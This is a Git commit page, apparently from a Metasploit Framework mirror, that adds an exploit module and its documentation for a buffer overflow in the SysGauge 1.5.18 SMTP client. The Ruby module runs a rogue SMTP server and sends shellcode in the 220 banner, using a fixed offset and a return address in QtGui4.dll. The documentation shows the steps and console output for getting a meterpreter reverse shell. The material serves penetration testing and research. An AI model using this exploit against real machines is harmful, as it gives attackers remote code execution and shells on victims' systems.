infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add sysgauge_client_bof module and documentation

bug/bundler_fix
Chris Higgins 2017-03-14 23:29:19 -05:00
parent e96013cd0f
commit cc4f18e6c5
2 changed files with 126 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

39
documentation/modules/exploit/windows/smtp/sysgauge_client_bof.md Normal file
View File

@ -0,0 +1,39 @@
## Vulnerable Application
This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
via its SMTP server validation. The module sends a malicious response along in the
220 service ready response and exploits the client resulting in an unpriviledged shell.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use exploit/windows/smtp/sysgauge_client_bof```
4. Do: ```set payload windows/meterpreter/reverse_tcp```
5. Do: ```set LHOST ip```
6. Do: ```run```
7. The user should put your `SRVHOST` or other applicable IP address in the SMTP configuration
in the program, and hit the "Verify Email ..." button.
8. You should get a shell.
## Scenarios
Here is how to typically execute the module. Note that the client must input this SMTP server
information under SysGauge Options and hit the "Verify Email ..." button.
```
msf > use exploit/windows/smtp/sysgauge_client_bof
msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf exploit(sysgauge_client_bof) > exploit
[*] Exploit running as background job.
msf exploit(sysgauge_client_bof) >
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Server started.
[*] Client connected: 10.0.0.128
[*] Sending payload...
[*] Sending stage (957487 bytes) to 10.0.0.128
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500
```

87
modules/exploits/windows/smtp/sysgauge_client_bof.rb Normal file
View File

@ -0,0 +1,87 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
# Fuzzer written by corelanc0d3r - <peter.ve [at] corelan.be>
# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
#
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::TcpServer
def initialize()
super(
'Name' => 'SysGauge SMTP Validation Buffer Overflow',
'Description' => %q{
This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
via its SMTP server validation. The module sends a malicious response along in the
220 service ready response and exploits the client resulting in an unpriviledged shell.
},
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'Peter Baris'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '41479' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 306,
'Smallest' => true,
'BadChars' => "\x00\x0a\x0d\x20"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal',
{
'Offset' => 176,
'Ret' => 0x6527635E # call esp # QtGui4.dll
}
]
],
'Privileged' => 'false',
'DisclosureDate' => 'Feb 28 2017',
'DefaultTarget' => 0
)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
], self.class)
end
def setup
super
end
def on_client_connect(c)
sploit = "220 "
sploit += rand_text(target['Offset'])
# Can only use the last part starting from 232 bytes in
sploit += payload.encoded[232..-1]
sploit += rand_text(2)
sploit += [target.ret].pack('V')
sploit += rand_text(12)
sploit += make_nops(8)
# And the first part up to 232 bytes
sploit += payload.encoded[0..231]
sploit += "ESMTP Sendmail \r\n"
print_status("Client connected: " + c.peerhost)
print_status("Sending payload...")
c.put(sploit)
end
end